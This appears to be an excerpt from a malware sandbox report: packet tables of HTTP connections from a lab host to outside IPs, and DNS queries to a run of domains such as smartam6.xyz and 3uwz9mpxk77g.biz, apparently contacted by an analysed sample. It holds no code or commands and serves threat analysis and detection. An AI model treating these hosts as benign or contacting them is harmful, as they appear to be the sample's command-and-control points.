                                                                                                                                                    Nov 29, 2021 14:11:47.257230043 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257419109 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.257534027 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.257559061 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257611036 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257694960 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257749081 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257803917 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257836103 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257865906 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257900953 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257947922 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.257953882 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.257980108 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258128881 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258126974 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258167982 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258236885 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258249044 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258270025 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258306980 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258466005 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258510113 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258651972 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258770943 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258970022 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.268356085 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.268563986 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269016981 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269188881 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269252062 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269433022 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269501925 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269567966 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269757032 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269783020 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269845963 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269959927 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270042896 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270078897 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270111084 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270132065 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270183086 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270241022 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270311117 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270327091 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270365953 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270425081 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270456076 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270486116 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270495892 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270545006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270576954 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270659924 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270704031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270843029 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270863056 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270899057 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270931005 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.271013975 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.271192074 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.271398067 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.279687881 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.279853106 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.280405045 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280644894 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.280647993 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280889034 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280946016 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281172037 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281549931 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281709909 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281796932 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281821966 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281943083 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281955957 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282150030 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282186031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282224894 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282303095 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282336950 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282354116 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282413006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282474041 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282572031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282655954 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282825947 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282852888 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282907009 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282939911 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282970905 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283091068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283128023 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283191919 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283237934 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.283330917 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283471107 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283624887 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283663988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283694983 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.290972948 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.291755915 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.292016983 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.294673920 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.300093889 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354579926 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354654074 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354926109 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.354983091 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.366092920 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.404886007 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.404977083 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.405059099 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.405143976 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:12:09.702656031 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.711189032 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.711421013 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.711518049 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.720061064 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865227938 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865293980 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865544081 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.865611076 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.874506950 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:14.900017977 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.069439888 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.069787025 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.069869041 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.239377975 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239454985 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239505053 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239835978 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.239902973 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.409240007 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.438467026 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.466788054 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.466950893 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.467041016 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.495929003 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.495979071 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.496229887 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.496279001 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.524744034 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.507714987 CET4986080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:12:35.516978979 CET8049860172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.517137051 CET4986080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:12:35.517215014 CET4986080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:12:35.526407957 CET8049860172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.698385954 CET8049860172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.698400021 CET8049860172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.698570967 CET8049860172.67.201.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:35.698580980 CET4986080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:12:35.698590040 CET4986080192.168.11.20172.67.201.232
                                                                                                                                                    Nov 29, 2021 14:12:35.698731899 CET4986080192.168.11.20172.67.201.232

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 29, 2021 14:05:26.031290054 CET6054853192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:05:26.052336931 CET53605481.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:06:49.334896088 CET6347953192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:06:49.347855091 CET53634791.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:06:54.364252090 CET5141953192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:06:54.393012047 CET53514191.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:00.082156897 CET6161353192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:00.261423111 CET53616131.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.268160105 CET5142053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:05.629437923 CET53514201.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:10.830044985 CET6481453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:10.901668072 CET53648141.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:15.907026052 CET5547253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:16.495420933 CET53554721.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.185935974 CET6394853192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:22.531332016 CET53639481.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:27.856801987 CET5443753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:27.877001047 CET53544371.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:32.886917114 CET5620353192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:32.949280977 CET53562031.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:37.963434935 CET5322053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:38.860960007 CET53532201.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.165285110 CET5982353192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:44.189960003 CET53598231.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.226825953 CET5710753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:49.452466011 CET53571071.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:54.788034916 CET5264853192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:07:54.831593990 CET53526481.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:04.848604918 CET6408453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:05.156760931 CET53640841.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:10.347084045 CET5334153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:11.362332106 CET5334153192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:08:12.377351999 CET5334153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:13.178037882 CET53533411.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:13.178102970 CET53533411.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:13.178436041 CET5334153192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:08:13.178529978 CET5334153192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:08:30.577145100 CET6093753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:30.632986069 CET53609371.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:35.904197931 CET5444153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:35.916707039 CET53544411.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.919406891 CET6325653192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:40.952147961 CET53632561.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:45.980460882 CET4940353192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:46.173491001 CET53494031.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:51.728553057 CET5972753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:52.098727942 CET53597271.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:57.446604967 CET5285253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:08:57.508605003 CET53528521.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.523262978 CET6158953192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:09:02.694595098 CET53615891.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:07.819602966 CET5141053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:09:07.862540007 CET53514101.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:12.864388943 CET5529253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:09:12.914556980 CET53552921.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:33.578607082 CET5903053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:09:33.625648975 CET53590301.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:38.640125036 CET4995253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:09:38.898581982 CET53499521.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:03.946757078 CET5198053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:04.165286064 CET5198053192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:05.180613995 CET5198053192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:06.737171888 CET53519801.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:06.737231970 CET53519801.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:06.737534046 CET5198053192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:06.737622023 CET5198053192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:10.742304087 CET5617453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:10.960792065 CET5617453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:11.976008892 CET5617453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:12.273320913 CET53561741.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:12.273365974 CET53561741.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:12.273547888 CET5617453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:12.273586988 CET5617453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:10:29.331868887 CET5100153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:29.375750065 CET53510011.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.377741098 CET5264653192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:34.394896030 CET53526461.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.892662048 CET5379653192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:39.913105965 CET53537961.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:45.048165083 CET5554653192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:45.077820063 CET53555461.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:50.093056917 CET5324153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:50.230967999 CET53532411.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:55.810662031 CET5958153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:10:55.839658022 CET53595811.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:00.857038021 CET5304953192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:00.913892984 CET53530491.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:11.713496923 CET5474653192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:11.751492977 CET53547461.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:32.818710089 CET5068253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:32.859806061 CET53506821.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:52.360733032 CET5531453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:52.578974962 CET5531453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:11:53.594285011 CET5531453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:55.609416962 CET5531453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:11:55.609427929 CET5531453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:11:55.829427958 CET53553141.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:55.829490900 CET53553141.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:55.829535961 CET53553141.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:55.829699039 CET5531453192.168.11.209.9.9.9
                                                                                                                                                    Nov 29, 2021 14:11:56.764240026 CET53553149.9.9.9192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.684891939 CET5188253192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:09.701877117 CET53518821.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:14.871531010 CET6536153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:14.899331093 CET53653611.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:20.245069981 CET5234753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:20.350740910 CET53523471.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:25.353204012 CET5740453192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:25.372308969 CET53574041.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.383773088 CET5996753192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:30.437779903 CET53599671.1.1.1192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:40.709778070 CET6488153192.168.11.201.1.1.1
                                                                                                                                                    Nov 29, 2021 14:12:40.916712046 CET53648811.1.1.1192.168.11.20

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Nov 29, 2021 14:05:26.031290054 CET192.168.11.201.1.1.10xeeb2Standard query (0)bgreenidaho.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:06:49.334896088 CET192.168.11.201.1.1.10xc6cdStandard query (0)www.smartam6.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:06:54.364252090 CET192.168.11.201.1.1.10xf21aStandard query (0)www.diggingquartz.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:00.082156897 CET192.168.11.201.1.1.10x6267Standard query (0)www.testwebsite0711.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:05.268160105 CET192.168.11.201.1.1.10x7e26Standard query (0)www.effective.storeA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:10.830044985 CET192.168.11.201.1.1.10x218aStandard query (0)www.tvterradafarinha.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:15.907026052 CET192.168.11.201.1.1.10x901dStandard query (0)www.ayudavida.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:22.185935974 CET192.168.11.201.1.1.10xca9Standard query (0)www.gdav130.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:27.856801987 CET192.168.11.201.1.1.10x968fStandard query (0)www.csenmoga.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:32.886917114 CET192.168.11.201.1.1.10x4ab2Standard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:37.963434935 CET192.168.11.201.1.1.10x4f0Standard query (0)www.dietatrintadias.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:44.165285110 CET192.168.11.201.1.1.10x7ffbStandard query (0)www.helpcloud.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:49.226825953 CET192.168.11.201.1.1.10x2f23Standard query (0)www.stylesbykee.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:54.788034916 CET192.168.11.201.1.1.10xe76dStandard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:04.848604918 CET192.168.11.201.1.1.10xafb5Standard query (0)www.mummymotors.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:10.347084045 CET192.168.11.201.1.1.10x2a0bStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:11.362332106 CET192.168.11.209.9.9.90x2a0bStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:12.377351999 CET192.168.11.201.1.1.10x2a0bStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:13.178436041 CET192.168.11.209.9.9.90x2a0bStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:13.178529978 CET192.168.11.209.9.9.90x2a0bStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:30.577145100 CET192.168.11.201.1.1.10x3607Standard query (0)www.fatima2021.comA (IP address)IN (0x0001)
